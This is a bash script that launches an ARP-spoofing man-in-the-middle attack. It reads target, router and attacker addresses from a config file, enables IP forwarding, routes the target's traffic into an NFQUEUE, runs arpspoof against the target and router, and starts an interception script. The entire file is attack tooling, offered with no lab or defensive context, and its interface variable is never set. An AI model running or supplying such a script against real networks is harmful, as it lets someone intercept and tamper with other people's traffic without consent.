#!/bin/bash

if [[ $EUID -ne 0 ]]; then
	echo "This script must be run by root"
	exit 1
fi

target=`jq -r '.target' config.json`
router=`jq -r '.router' config.json`
attacker=`jq -r '.attacker' config.json`

echo "" > log

trap 'end' INT

function end() {
	kill $PID1
	kill $PID2
	iptables -D FORWARD 1
	iptables -D FORWARD 1
	echo "Shutting down..."
	wait $PID1
}

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -A FORWARD -d $target -j NFQUEUE --queue-num 0
iptables -A FORWARD -s $target -j NFQUEUE --queue-num 0

arpspoof -i $interface -t $target -r $router > arpspoof.log 2>&1 &
PID1=$!

./intercept.py 2>&1 &
PID2=$!

cat
